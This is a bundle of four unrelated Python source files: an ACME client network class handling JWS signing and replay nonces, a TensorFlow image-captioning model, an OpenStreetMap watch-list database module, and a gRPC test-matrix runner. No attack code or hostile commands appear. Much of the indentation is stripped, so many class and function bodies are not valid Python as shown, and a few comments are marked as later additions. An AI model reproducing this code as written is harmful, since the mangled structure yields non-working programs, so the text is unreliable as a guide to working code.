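    return certr, client.fetch_chain(certr)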
class ClientNetwork(object):
"""Client network."""
JSON_CONTENT_TYPE = 'application/json'
JSON_ERROR_CONTENT_TYPE = 'application/problem+json'
REPLAY_NONCE_HEADER = 'Replay-Nonce'
def __init__(self, key, alg=jose.RS256, verify_ssl=True,
user_agent='acme-python'):
self.key = key
self.alg = alg
self.verify_ssl = verify_ssl
self._nonces = set()
self.user_agent = user_agent
def _wrap_in_jws(self, obj, nonce):
"""Wrap `JSONDeSerializable` object in JWS.
.. todo:: Implement ``acmePath``.
:param .JSONDeSerializable obj:
:param bytes nonce:
:rtype: `.JWS`
"""
jobj = obj.json_dumps().encode()
logger.debug('Serialized JSON: %s', jobj)
return jws.JWS.sign(
payload=jobj, key=self.key, alg=self.alg, nonce=nonce).json_dumps()
@classmethod
def _check_response(cls, response, content_type=None):
"""Check response content and its type.
.. note::
Checking is not strict: wrong server response ``Content-Type``
HTTP header is ignored if response is an expected JSON object
(c.f. Boulder #56).
:param str content_type: Expected Content-Type response header.
If JSON is expected and not present in server response, this
function will raise an error. Otherwise, wrong Content-Type
is ignored, but logged.
:raises .messages.Error: If server response body
carries HTTP Problem (draft-ietf-appsawg-http-problem-00).
:raises .ClientError: In case of other networking errors.
"""
logger.debug('Received response %s (headers: %s): %r',
response, response.headers, response.content)
response_ct = response.headers.get('Content-Type')
try:
# TODO: response.json() is called twice, once here, and
# once in _get and _post clients
jobj = response.json()
except ValueError as error:
jobj = None
if not response.ok:
if jobj is not None:
if response_ct != cls.JSON_ERROR_CONTENT_TYPE:
logger.debug(
'Ignoring wrong Content-Type (%r) for JSON Error',
response_ct)
try:
raise messages.Error.from_json(jobj)
except jose.DeserializationError as error:
# Couldn't deserialize JSON object
raise errors.ClientError((response, error))
else:
# response is not JSON object
raise errors.ClientError(response)
else:
if jobj is not None and response_ct != cls.JSON_CONTENT_TYPE:
logger.debug(
'Ignoring wrong Content-Type (%r) for JSON decodable '
'response', response_ct)
if content_type == cls.JSON_CONTENT_TYPE and jobj is None:
raise errors.ClientError(
'Unexpected response Content-Type: {0}'.format(response_ct))
return response
def _send_request(self, method, url, *args, **kwargs):
"""Send HTTP request.
Makes sure that `verify_ssl` is respected. Logs request and
response (with headers). For allowed parameters please see
`requests.request`.
:param str method: method for the new `requests.Request` object
:param str url: URL for the new `requests.Request` object
:raises requests.exceptions.RequestException: in case of any problems
:returns: HTTP Response
:rtype: `requests.Response`
"""
        logger.debug('Sending %s request to %s. args: %r, kwargs: %r',
                     method, url, args, kwargs)
kwargs['verify'] = self.verify_ssl
kwargs.setdefault('headers', {})
kwargs['headers'].setdefault('User-Agent', self.user_agent)
response = requests.request(method, url, *args, **kwargs)
        logger.debug('Received %s. Headers: %s. Content: %r',
                     response, response.headers, response.content)
return response
def head(self, *args, **kwargs):
"""Send HEAD request without checking the response.
        Note that `_check_response` is not called, as it is expected
        that a status code other than a successful 2xx will be returned, or
        that a messages.Error will be raised by the server.
"""
return self._send_request('HEAD', *args, **kwargs)
def get(self, url, content_type=JSON_CONTENT_TYPE, **kwargs):
"""Send GET request and check response."""
return self._check_response(
self._send_request('GET', url, **kwargs), content_type=content_type)
def _add_nonce(self, response):
if self.REPLAY_NONCE_HEADER in response.headers:
nonce = response.headers[self.REPLAY_NONCE_HEADER]
try:
decoded_nonce = jws.Header._fields['nonce'].decode(nonce)
except jose.DeserializationError as error:
raise errors.BadNonce(nonce, error)
logger.debug('Storing nonce: %r', decoded_nonce)
self._nonces.add(decoded_nonce)
else:
raise errors.MissingNonce(response)
def _get_nonce(self, url):
if not self._nonces:
            logger.debug('Requesting fresh nonce')
self._add_nonce(self.head(url))
return self._nonces.pop()
def post(self, url, obj, content_type=JSON_CONTENT_TYPE, **kwargs):
"""POST object wrapped in `.JWS` and check response."""
data = self._wrap_in_jws(obj, self._get_nonce(url))
response = self._send_request('POST', url, data=data, **kwargs)
self._add_nonce(response)
return self._check_response(response, content_type=content_type)
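# Note on nonce handling (added summary, not part of the original module):
# ClientNetwork.post() signs each payload with a nonce from _get_nonce(), which
# issues a HEAD request to the same URL when the local cache is empty;
# _add_nonce() then caches the Replay-Nonce returned with the POST response so
# the next request can reuse it without an extra round trip.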
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Image-to-text implementation based on http://arxiv.org/abs/1411.4555.
"Show and Tell: A Neural Image Caption Generator"
Oriol Vinyals, Alexander Toshev, Samy Bengio, Dumitru Erhan
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Standard Imports
import tensorflow as tf
import image_embedding
import image_processing
import inputs as input_ops
class ShowAndTellModel(object):
"""Image-to-text implementation based on http://arxiv.org/abs/1411.4555.
"Show and Tell: A Neural Image Caption Generator"
Oriol Vinyals, Alexander Toshev, Samy Bengio, Dumitru Erhan
"""
def __init__(self, config, mode, train_inception=False):
"""Basic setup.
Args:
config: Object containing configuration parameters.
mode: "train", "eval" or "inference".
train_inception: Whether the inception submodel variables are trainable.
"""
assert mode in ["train", "eval", "inference"]
self.config = config
self.mode = mode
self.train_inception = train_inception
# To match the "Show and Tell" paper we initialize all variables with a
# random uniform initializer.
self.initializer = tf.random_uniform_initializer(
minval=-self.config.initializer_scale,
maxval=self.config.initializer_scale)
# A float32 Tensor with shape [batch_size, height, width, channels].
self.images = None
# An int32 Tensor with shape [batch_size, padded_length].
self.input_seqs = None
# An int32 Tensor with shape [batch_size, padded_length].
self.target_seqs = None
# An int32 0/1 Tensor with shape [batch_size, padded_length].
self.input_mask = None
# A float32 Tensor with shape [batch_size, embedding_size].
self.image_embeddings = None
# A float32 Tensor with shape [batch_size, padded_length, embedding_size].
self.seq_embeddings = None
# A float32 scalar Tensor; the total loss for the trainer to optimize.
self.total_loss = None
# A float32 Tensor with shape [batch_size * padded_length].
self.target_cross_entropy_losses = None
# A float32 Tensor with shape [batch_size * padded_length].
self.target_cross_entropy_loss_weights = None
# Collection of variables from the inception submodel.
self.inception_variables = []
# Function to restore the inception submodel from checkpoint.
self.init_fn = None
# Global step Tensor.
self.global_step = None
def is_training(self):
"""Returns true if the model is built for training mode."""
return self.mode == "train"
def load_image(self, encoded_image, thread_id=0):
"""Decodes and processes an image string.
Args:
encoded_image: A scalar string Tensor; the encoded image.
thread_id: Preprocessing thread id used to select the ordering of color
distortions.
Returns:
A float32 Tensor of shape [height, width, 3]; the processed image.
"""
return image_processing.process_image(
encoded_image,
is_training=self.is_training(),
height=self.config.image_height,
width=self.config.image_width,
thread_id=thread_id,
image_format=self.config.image_format)
def distort_images(self, images, seed):
"""Distort a batch of images.
(Processing a batch allows us to easily switch between TPU and CPU
execution).
"""
if self.mode == "train":
images = image_processing.distort_image(images, seed)
# Rescale to [-1,1] instead of [0, 1]
images = tf.subtract(images, 0.5)
images = tf.multiply(images, 2.0)
return images
def build_inputs(self):
"""Input prefetching, preprocessing and batching.
Outputs:
self.images
self.input_seqs
self.target_seqs (training and eval only)
self.input_mask (training and eval only)
"""
if self.mode == "inference":
# In inference mode, images and inputs are fed via placeholders.
image_feed = tf.placeholder(dtype=tf.string, shape=[], name="image_feed")
input_feed = tf.placeholder(
dtype=tf.int64,
shape=[None], # batch_size
name="input_feed")
# Process image and insert batch dimensions.
images = tf.expand_dims(self.load_image(image_feed), 0)
input_seqs = tf.expand_dims(input_feed, 1)
# No target sequences or input mask in inference mode.
target_seqs = None
input_mask = None
else:
def _load_example(serialized_example):
encoded_image, caption = input_ops.parse_example(
serialized_example,
image_feature=self.config.image_feature_name,
caption_feature=self.config.caption_feature_name)
image = self.load_image(encoded_image)
# strings.split expects a batch
words = tf.strings.split(tf.reshape(caption, [1]), sep=" ")
words = tf.sparse_tensor_to_dense(words, default_value="")[0]
word_idx = tf.strings.to_hash_bucket(words, self.config.vocab_size)
input_seqs, target_seqs, input_mask = input_ops.pad_caption_to_input(
word_idx)
return image, input_seqs, target_seqs, input_mask
def _load_dataset(filename):
return tf.data.TFRecordDataset(filename, buffer_size=16 * 1024 * 1024)
df = tf.data.Dataset.list_files(
self.config.input_file_pattern, shuffle=self.mode == "train")
df = df.apply(
tf.data.experimental.parallel_interleave(
_load_dataset, cycle_length=64, sloppy=True))
if self.mode == "train":
df = df.repeat()
df = df.shuffle(1024)
df = df.apply(
tf.data.experimental.map_and_batch(
_load_example,
self.config.batch_size,
num_parallel_batches=8,
drop_remainder=True))
df = df.prefetch(8)
images, input_seqs, target_seqs, input_mask = df.make_one_shot_iterator(
).get_next()
self.images = images
self.input_seqs = input_seqs
self.target_seqs = target_seqs
self.input_mask = input_mask
def build_image_embeddings(self, images):
"""Builds the image model subgraph and generates image embeddings.
Inputs:
images
Outputs:
self.image_embeddings
"""
images = self.distort_images(images, tf.train.get_or_create_global_step())
inception_output = image_embedding.inception_v3(
images,
trainable=self.train_inception,
is_training=self.is_training(),
add_summaries=False)
self.inception_variables = tf.get_collection(
tf.GraphKeys.GLOBAL_VARIABLES, scope="InceptionV3")
# Map inception output into embedding space.
with tf.variable_scope("image_embedding") as scope:
image_embeddings = tf.contrib.layers.fully_connected(
inputs=inception_output,
num_outputs=self.config.embedding_size,
activation_fn=None,
weights_initializer=self.initializer,
biases_initializer=None,
scope=scope)
# Save the embedding size in the graph.
tf.constant(self.config.embedding_size, name="embedding_size")
return image_embeddings
def build_seq_embeddings(self, input_seqs):
"""Builds the input sequence embeddings.
Inputs:
input_seqs
Outputs:
self.seq_embeddings
"""
with tf.variable_scope("seq_embedding"), tf.device("/cpu:0"):
embedding_map = tf.get_variable(
name="map",
shape=[self.config.vocab_size, self.config.embedding_size],
initializer=self.initializer)
seq_embeddings = tf.nn.embedding_lookup(embedding_map, input_seqs)
return seq_embeddings
def build_model(self):
"""Builds the model.
Inputs:
self.image_embeddings
self.seq_embeddings
self.target_seqs (training and eval only)
self.input_mask (training and eval only)
Outputs:
self.total_loss (training and eval only)
self.target_cross_entropy_losses (training and eval only)
self.target_cross_entropy_loss_weights (training and eval only)
"""
# This LSTM cell has biases and outputs tanh(new_c) * sigmoid(o), but the
# modified LSTM in the "Show and Tell" paper has no biases and outputs
# new_c * sigmoid(o).
lstm_cell = tf.contrib.rnn.BasicLSTMCell(
num_units=self.config.num_lstm_units, state_is_tuple=True)
if self.mode == "train":
lstm_cell = tf.contrib.rnn.DropoutWrapper(
lstm_cell,
input_keep_prob=self.config.lstm_dropout_keep_prob,
output_keep_prob=self.config.lstm_dropout_keep_prob)
with tf.variable_scope("lstm", initializer=self.initializer) as lstm_scope:
# Feed the image embeddings to set the initial LSTM state.
zero_state = lstm_cell.zero_state(
batch_size=self.image_embeddings.get_shape()[0], dtype=tf.float32)
_, initial_state = lstm_cell(self.image_embeddings, zero_state)
# Allow the LSTM variables to be reused.
lstm_scope.reuse_variables()
if self.mode == "inference":
# In inference mode, use concatenated states for convenient feeding and
# fetching.
tf.concat(initial_state, 1, name="initial_state")
# Placeholder for feeding a batch of concatenated states.
state_feed = tf.placeholder(
dtype=tf.float32,
shape=[None, sum(lstm_cell.state_size)],
name="state_feed")
state_tuple = tf.split(value=state_feed, num_or_size_splits=2, axis=1)
# Run a single LSTM step.
lstm_outputs, state_tuple = lstm_cell(
inputs=tf.squeeze(self.seq_embeddings, squeeze_dims=[1]),
state=state_tuple)
        # Concatenate the resulting state.
tf.concat(state_tuple, 1, name="state")
else:
# Run the batch of sequence embeddings through the LSTM.
sequence_length = tf.reduce_sum(self.input_mask, 1)
lstm_outputs, _ = tf.nn.dynamic_rnn(
cell=lstm_cell,
inputs=self.seq_embeddings,
sequence_length=sequence_length,
initial_state=initial_state,
dtype=tf.float32,
scope=lstm_scope)
# Stack batches vertically.
lstm_outputs = tf.reshape(lstm_outputs, [-1, lstm_cell.output_size])
with tf.variable_scope("logits") as logits_scope:
logits = tf.contrib.layers.fully_connected(
inputs=lstm_outputs,
num_outputs=self.config.vocab_size,
activation_fn=None,
weights_initializer=self.initializer,
scope=logits_scope)
if self.mode == "inference":
tf.nn.softmax(logits, name="softmax")
else:
targets = tf.reshape(self.target_seqs, [-1])
weights = tf.to_float(tf.reshape(self.input_mask, [-1]))
# Compute losses.
losses = tf.nn.sparse_softmax_cross_entropy_with_logits(
labels=targets, logits=logits)
batch_loss = tf.div(
tf.reduce_sum(tf.multiply(losses, weights)),
tf.reduce_sum(weights),
name="batch_loss")
tf.losses.add_loss(batch_loss)
total_loss = tf.losses.get_total_loss()
self.total_loss = total_loss
self.target_cross_entropy_losses = losses # Used in evaluation.
self.target_cross_entropy_loss_weights = weights # Used in evaluation.
def setup_inception_initializer(self):
"""Sets up the function to restore inception variables from checkpoint."""
if self.mode != "inference":
# Restore inception variables only.
saver = tf.train.Saver(self.inception_variables)
def restore_fn(sess):
tf.logging.info("Restoring Inception variables from checkpoint file %s",
self.config.inception_checkpoint_file)
saver.restore(sess, self.config.inception_checkpoint_file)
self.init_fn = restore_fn
def setup_global_step(self):
"""Sets up the global step Tensor."""
self.global_step = tf.train.get_or_create_global_step()
def build_model_for_tpu(self, images, input_seqs, target_seqs, input_mask):
self.image_embeddings = self.build_image_embeddings(images)
self.seq_embeddings = self.build_seq_embeddings(target_seqs)
self.target_seqs = target_seqs
self.input_mask = input_mask
self.build_model()
def build(self):
"""Creates all ops for training and evaluation."""
self.build_inputs()
self.image_embeddings = self.build_image_embeddings(self.images)
self.seq_embeddings = self.build_seq_embeddings(self.input_seqs)
self.build_model()
self.setup_inception_initializer()
self.setup_global_step()
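# Illustrative usage sketch (added; not part of the original module). Any
# config object exposing the fields referenced above (batch_size, vocab_size,
# embedding_size, num_lstm_units, image sizes, input_file_pattern, ...) works.
def _example_build_training_graph(config):
  model = ShowAndTellModel(config, mode="train", train_inception=False)
  model.build()  # wires inputs, embeddings, the LSTM and the loss ops
  return model.total_loss  # scalar loss Tensor to hand to an optimizer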
|
|
"""
db.py
Functions that interact with the database.
"""
from osmhm import connect
def add_watched_user(username, reason=None, author=None, authorid=None, email=None):
"""
Add user to watched user list for tracking.
Inputs
------
username : str
Username to track
reason : str, optional
Reason to track user
author : str, optional
User adding tracking entry
authorid : int, optional
Userid of user adding entry
email : str, optional
Email address for notification of events
"""
conn = connect.connect()
cur = conn.cursor()
info = (username, reason, author, authorid, email)
cur.execute("""INSERT INTO watched_users
(username, reason, author, authorid, email)
VALUES (%s, %s, %s, %s, %s);""", info)
conn.commit()
def remove_watched_user(username, authorid=None):
"""
Remove user from tracking list associated with authorid.
Inputs
------
username : str
Username to remove from database
authorid : int, optional
Userid of user adding entry
"""
conn = connect.connect()
cur = conn.cursor()
info = (username, authorid)
cur.execute("""DELETE FROM watched_users WHERE
username = %s and authorid = %s;""", info)
conn.commit()
def add_watched_user_event(changeset, wid):
"""
Add watched user event.
Inputs
------
changeset : dict
Information about user event
wid : int
Watched object ID
"""
conn = connect.connect()
cur = conn.cursor()
info = (wid, changeset['id'], changeset['timestamp'], changeset['uid'],
changeset['create'], changeset['modify'], changeset['delete'])
cur.execute("""INSERT INTO history_users
(wid, changeset, timestamp, userid, created, modified, \
deleted) VALUES (%s, %s, %s, %s, %s, %s, %s);""", info)
conn.commit()
def add_watched_user_object(username, reason=None, author=None, authorid=None, email=None):
"""
Add user to watched user list with object composites for tracking.
Inputs
------
username : str
Username to track
reason : str, optional
Reason to track user
author : str, optional
User adding tracking entry
authorid : int, optional
Userid of user adding entry
email : str, optional
Email address for notification of events
"""
conn = connect.connect()
cur = conn.cursor()
info = (username, reason, author, authorid, email)
cur.execute("""INSERT INTO watched_users_objects
(username, reason, author, authorid, email)
VALUES (%s, %s, %s, %s, %s);""", info)
conn.commit()
def remove_watched_user_object(username, authorid=None):
"""
Remove user from object composite user tracking list
associated with authorid.
Inputs
------
username : str
Username to remove from database
authorid : int, optional
Userid of user adding entry
"""
conn = connect.connect()
cur = conn.cursor()
info = (username, authorid)
cur.execute("""DELETE FROM watched_users_objects WHERE
username = %s and authorid = %s;""", info)
conn.commit()
def add_watched_object(element, reason=None, author=None, authorid=None, email=None):
"""
Add object to watched object list.
Inputs
------
element : str
Object to track, with type specified as single letter
prepended to object id (e.g. node 322 is 'n322')
reason : str, optional
        Reason to track object
author : str, optional
User adding tracking entry
authorid : int, optional
Userid of user adding entry
email : str, optional
Email address for notification of events
"""
conn = connect.connect()
cur = conn.cursor()
info = (element, reason, author, authorid, email)
cur.execute("""INSERT INTO watched_objects
(element, reason, author, authorid, email)
VALUES (%s, %s, %s, %s, %s);""", info)
conn.commit()
def remove_watched_object(element, authorid=None):
"""
Remove object from object tracking list associated with authorid.
Inputs
------
element : str
Object to track, with type specified as single letter
prepended to object id (e.g. node 322 is 'n322')
authorid : int, optional
Userid of user adding entry
"""
conn = connect.connect()
cur = conn.cursor()
info = (element, authorid)
cur.execute("""DELETE FROM watched_objects WHERE
element = %s and authorid = %s;""", info)
conn.commit()
def add_watched_object_event(changeset, wid):
"""
Add watched object event.
Inputs
------
changeset : dict
Information about object event
wid : int
Watched object ID
"""
conn = connect.connect()
cur = conn.cursor()
info = (wid, changeset['timestamp'],
changeset['username'].encode('utf8'), changeset['uid'],
changeset['action'], changeset['changeset'])
cur.execute("""INSERT INTO history_objects
(wid, timestamp, username, userid, action, changeset)
VALUES (%s, %s, %s, %s, %s, %s);""", info)
conn.commit()
def add_watched_key(key, value, reason=None, author=None, authorid=None, email=None):
"""
Add key/value combination to key/value tracking list.
Inputs
------
key : str
Key to track; can be wildcard
value : str
Key value to track; can be wildcard
reason : str, optional
        Reason to track key/value combination
author : str, optional
User adding tracking entry
authorid : int, optional
Userid of user adding entry
email : str, optional
Email address for notification of events
"""
conn = connect.connect()
cur = conn.cursor()
info = (key, value, reason, author, authorid, email)
cur.execute("""INSERT INTO watched_keys
(key, value, reason, author, authorid, email)
VALUES (%s, %s, %s, %s, %s, %s);""", info)
conn.commit()
def remove_watched_key(key, value, authorid=None):
"""
    Remove key/value combination from key tracking list associated with authorid.
Inputs
------
key : str
Key to remove
value : str
Key value to remove
authorid : int, optional
Userid of user adding entry
"""
conn = connect.connect()
cur = conn.cursor()
info = (key, value, authorid)
cur.execute("""DELETE FROM watched_keys WHERE
key = %s and value = %s and authorid = %s;""", info)
conn.commit()
def add_watched_key_event(changeset, key, wid):
"""
Add watched key event.
Inputs
------
changeset : dict
Information about key event
wid : int
Watched key ID
"""
conn = connect.connect()
cur = conn.cursor()
info = (wid, changeset['id'], changeset['timestamp'],
changeset['username'].encode('utf8'), changeset['uid'],
changeset['action'], key, changeset['tags'][key],
changeset['changeset'])
cur.execute("""INSERT INTO history_keys
(wid, element, timestamp, username, userid, action, key,
value, changeset) VALUES
(%s, %s, %s, %s, %s, %s, %s, %s, %s);""", info)
conn.commit()
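# Illustrative sketch of the key-tracking helpers above (assumes a configured
# `connect` module and that the watched_keys/history_keys tables exist;
# wildcard matching of keys and values is assumed to happen elsewhere during
# changeset processing):
#
#     add_watched_key('amenity', '*', reason='watch all amenity edits',
#                     author='admin', authorid=1,
#                     email='admin@example.org')
#     remove_watched_key('amenity', '*', authorid=1)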
def add_whitelisted_user(username, reason=None, author=None, authorid=None):
"""
Add a whitelisted user who will not be picked up by tracking.
Inputs
------
username : str
Username to track
reason : str, optional
Reason to whitelist the user
author : str, optional
User adding tracking entry
authorid : int, optional
Userid of user adding entry
"""
conn = connect.connect()
cur = conn.cursor()
info = (username, reason, author, authorid)
cur.execute("""INSERT INTO whitelisted_users
(username, reason, author, authorid)
VALUES (%s, %s, %s, %s);""", info)
conn.commit()
def remove_whitelisted_user(username, authorid=None):
"""
Remove whitelisted user from untracked list.
Inputs
------
username : str
Username to remove
authorid : int, optional
Userid of the user who added the entry
"""
conn = connect.connect()
cur = conn.cursor()
info = (username, authorid)
cur.execute("""DELETE FROM whitelisted_users WHERE
username = %s and authorid = %s;""", info)
conn.commit()
def add_last_file(sequence, timestamp, timetype, read):
"""
Add information about the last state file seen.
Inputs
------
sequence : int
Sequence number of state file
timestamp : str
Stringified timestamp from file
timetype : str
Time resolution of state file
read : bool
Flag indicating if file has been read or not
"""
conn = connect.connect()
cur = conn.cursor()
cur.execute("""INSERT INTO file_list
(sequence, timestamp, timetype, read)
VALUES (%s, %s, %s, %s);""",
(sequence, timestamp, timetype, read))
conn.commit()
def get_last_file():
"""
Retrieve information about the last state file seen.
"""
conn = connect.connect()
cur = conn.cursor()
cur.execute("SELECT * FROM file_list;")
return cur.fetchone()
def update_last_file(sequence, timestamp, timetype, read):
"""
Update information about the last state file seen.
Inputs
------
sequence : int
Sequence number of state file
timestamp : str
Stringified timestamp from file
timetype : str
Time resolution of state file
read : bool
Flag indicating if file has been read or not
"""
conn = connect.connect()
cur = conn.cursor()
cur.execute("""UPDATE file_list SET
(sequence, timestamp, timetype, read)
= (%s, %s, %s, %s);""",
(sequence, timestamp, timetype, read))
conn.commit()
def remove_last_file():
"""
Remove the last file information.
"""
conn = connect.connect()
cur = conn.cursor()
cur.execute("DELETE FROM file_list;")
conn.commit()
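# Illustrative end-to-end sketch (hypothetical values; assumes the schema
# referenced by the functions above already exists):
#
#     add_watched_object('n322', reason='suspicious edits', author='admin',
#                        authorid=1, email='admin@example.org')
#     wid = 42  # hypothetical watched-object ID obtained from the database
#     add_watched_object_event({'timestamp': '2015-01-01T00:00:00Z',
#                               'username': u'mapper', 'uid': 123,
#                               'action': 'modify', 'changeset': 456}, wid)
#     add_last_file(1700, '2015-01-01T00:00:00Z', 'minute', True)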
|
|
#!/usr/bin/env python
# Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Run test matrix."""
from __future__ import print_function
import argparse
import multiprocessing
import os
import sys
import python_utils.jobset as jobset
import python_utils.report_utils as report_utils
from python_utils.filter_pull_request_tests import filter_tests
_ROOT = os.path.abspath(os.path.join(os.path.dirname(sys.argv[0]), '../..'))
os.chdir(_ROOT)
_DEFAULT_RUNTESTS_TIMEOUT = 1 * 60 * 60
# Set the timeout high to allow enough time for sanitizers and pre-building
# clang docker.
_CPP_RUNTESTS_TIMEOUT = 4 * 60 * 60
# C++ TSAN takes longer than other sanitizers
_CPP_TSAN_RUNTESTS_TIMEOUT = 8 * 60 * 60
# Set timeout high for ObjC for Cocoapods to install pods
_OBJC_RUNTESTS_TIMEOUT = 90 * 60
# Number of jobs assigned to each run_tests.py instance
_DEFAULT_INNER_JOBS = 2
# Name of the top-level umbrella report that includes all the run_tests.py invocations
# Note that the starting letter 't' matters so that the targets are listed AFTER
# the per-test breakdown items that start with 'run_tests/' (it is more readable that way)
_MATRIX_REPORT_NAME = 'toplevel_run_tests_invocations'
def _safe_report_name(name):
"""Reports with '+' in target name won't show correctly in ResultStore"""
return name.replace('+', 'p')
def _report_filename(name):
"""Generates report file name with directory structure that leads to better presentation by internal CI"""
# 'sponge_log.xml' suffix must be there for results to get recognized by kokoro.
return '%s/%s' % (_safe_report_name(name), 'sponge_log.xml')
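# For example, _report_filename('c++_linux_dbg_native') yields
# 'cpp_linux_dbg_native/sponge_log.xml' ('+' is mapped to 'p' above).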
def _matrix_job_logfilename(shortname_for_multi_target):
"""Generate location for log file that will match the sponge_log.xml from the top-level matrix report."""
# 'sponge_log.log' suffix must be there for log to get recognized as "target log"
# for the corresponding 'sponge_log.xml' report.
# the shortname_for_multi_target component must be set to match the sponge_log.xml location
# because the top-level render_junit_xml_report is called with multi_target=True
return '%s/%s/%s' % (_MATRIX_REPORT_NAME, shortname_for_multi_target,
'sponge_log.log')
def _docker_jobspec(name,
runtests_args=[],
runtests_envs={},
inner_jobs=_DEFAULT_INNER_JOBS,
timeout_seconds=None):
"""Run a single instance of run_tests.py in a docker container"""
if not timeout_seconds:
timeout_seconds = _DEFAULT_RUNTESTS_TIMEOUT
shortname = 'run_tests_%s' % name
test_job = jobset.JobSpec(cmdline=[
'python', 'tools/run_tests/run_tests.py', '--use_docker', '-t', '-j',
str(inner_jobs), '-x',
'run_tests/%s' % _report_filename(name), '--report_suite_name',
'%s' % _safe_report_name(name)
] + runtests_args,
environ=runtests_envs,
shortname=shortname,
timeout_seconds=timeout_seconds,
logfilename=_matrix_job_logfilename(shortname))
return test_job
def _workspace_jobspec(name,
runtests_args=[],
workspace_name=None,
runtests_envs={},
inner_jobs=_DEFAULT_INNER_JOBS,
timeout_seconds=None):
"""Run a single instance of run_tests.py in a separate workspace"""
if not workspace_name:
workspace_name = 'workspace_%s' % name
if not timeout_seconds:
timeout_seconds = _DEFAULT_RUNTESTS_TIMEOUT
shortname = 'run_tests_%s' % name
env = {'WORKSPACE_NAME': workspace_name}
env.update(runtests_envs)
test_job = jobset.JobSpec(cmdline=[
'bash', 'tools/run_tests/helper_scripts/run_tests_in_workspace.sh',
'-t', '-j',
str(inner_jobs), '-x',
'../run_tests/%s' % _report_filename(name), '--report_suite_name',
'%s' % _safe_report_name(name)
] + runtests_args,
environ=env,
shortname=shortname,
timeout_seconds=timeout_seconds,
logfilename=_matrix_job_logfilename(shortname))
return test_job
def _generate_jobs(languages,
configs,
platforms,
iomgr_platforms=['native'],
arch=None,
compiler=None,
labels=[],
extra_args=[],
extra_envs={},
inner_jobs=_DEFAULT_INNER_JOBS,
timeout_seconds=None):
result = []
for language in languages:
for platform in platforms:
for iomgr_platform in iomgr_platforms:
for config in configs:
name = '%s_%s_%s_%s' % (language, platform, config,
iomgr_platform)
runtests_args = [
'-l', language, '-c', config, '--iomgr_platform',
iomgr_platform
]
if arch or compiler:
name += '_%s_%s' % (arch, compiler)
runtests_args += [
'--arch', arch, '--compiler', compiler
]
if '--build_only' in extra_args:
name += '_buildonly'
for extra_env in extra_envs:
name += '_%s_%s' % (extra_env, extra_envs[extra_env])
runtests_args += extra_args
if platform == 'linux':
job = _docker_jobspec(name=name,
runtests_args=runtests_args,
runtests_envs=extra_envs,
inner_jobs=inner_jobs,
timeout_seconds=timeout_seconds)
else:
job = _workspace_jobspec(
name=name,
runtests_args=runtests_args,
runtests_envs=extra_envs,
inner_jobs=inner_jobs,
timeout_seconds=timeout_seconds)
job.labels = [platform, config, language, iomgr_platform
] + labels
result.append(job)
return result
def _create_test_jobs(extra_args=[], inner_jobs=_DEFAULT_INNER_JOBS):
test_jobs = []
# sanity tests
test_jobs += _generate_jobs(languages=['sanity'],
configs=['dbg'],
platforms=['linux'],
labels=['basictests'],
extra_args=extra_args +
['--report_multi_target'],
inner_jobs=inner_jobs)
# supported on linux only
test_jobs += _generate_jobs(languages=['php7'],
configs=['dbg', 'opt'],
platforms=['linux'],
labels=['basictests', 'multilang'],
extra_args=extra_args +
['--report_multi_target'],
inner_jobs=inner_jobs)
# supported on all platforms.
test_jobs += _generate_jobs(
languages=['c'],
configs=['dbg', 'opt'],
platforms=['linux', 'macos', 'windows'],
labels=['basictests', 'corelang'],
extra_args=
extra_args, # don't use multi_target report because C has too many test cases
inner_jobs=inner_jobs,
timeout_seconds=_CPP_RUNTESTS_TIMEOUT)
# C# tests on .NET desktop/mono
test_jobs += _generate_jobs(languages=['csharp'],
configs=['dbg', 'opt'],
platforms=['linux', 'macos', 'windows'],
labels=['basictests', 'multilang'],
extra_args=extra_args +
['--report_multi_target'],
inner_jobs=inner_jobs)
# C# tests on .NET core
test_jobs += _generate_jobs(languages=['csharp'],
configs=['dbg', 'opt'],
platforms=['linux', 'macos', 'windows'],
arch='default',
compiler='coreclr',
labels=['basictests', 'multilang'],
extra_args=extra_args +
['--report_multi_target'],
inner_jobs=inner_jobs)
test_jobs += _generate_jobs(languages=['python'],
configs=['opt'],
platforms=['linux', 'macos', 'windows'],
iomgr_platforms=['native', 'gevent', 'asyncio'],
labels=['basictests', 'multilang'],
extra_args=extra_args +
['--report_multi_target'],
inner_jobs=inner_jobs)
# supported on linux and mac.
test_jobs += _generate_jobs(
languages=['c++'],
configs=['dbg', 'opt'],
platforms=['linux', 'macos'],
labels=['basictests', 'corelang'],
extra_args=
extra_args, # don't use multi_target report because C++ has too many test cases
inner_jobs=inner_jobs,
timeout_seconds=_CPP_RUNTESTS_TIMEOUT)
test_jobs += _generate_jobs(languages=['grpc-node', 'ruby', 'php'],
configs=['dbg', 'opt'],
platforms=['linux', 'macos'],
labels=['basictests', 'multilang'],
extra_args=extra_args +
['--report_multi_target'],
inner_jobs=inner_jobs)
# supported on mac only.
test_jobs += _generate_jobs(languages=['objc'],
configs=['opt'],
platforms=['macos'],
labels=['basictests', 'multilang'],
extra_args=extra_args +
['--report_multi_target'],
inner_jobs=inner_jobs,
timeout_seconds=_OBJC_RUNTESTS_TIMEOUT)
# sanitizers
test_jobs += _generate_jobs(languages=['c'],
configs=['msan', 'asan', 'tsan', 'ubsan'],
platforms=['linux'],
arch='x64',
compiler='clang7.0',
labels=['sanitizers', 'corelang'],
extra_args=extra_args,
inner_jobs=inner_jobs,
timeout_seconds=_CPP_RUNTESTS_TIMEOUT)
test_jobs += _generate_jobs(languages=['c++'],
configs=['asan'],
platforms=['linux'],
arch='x64',
compiler='clang7.0',
labels=['sanitizers', 'corelang'],
extra_args=extra_args,
inner_jobs=inner_jobs,
timeout_seconds=_CPP_RUNTESTS_TIMEOUT)
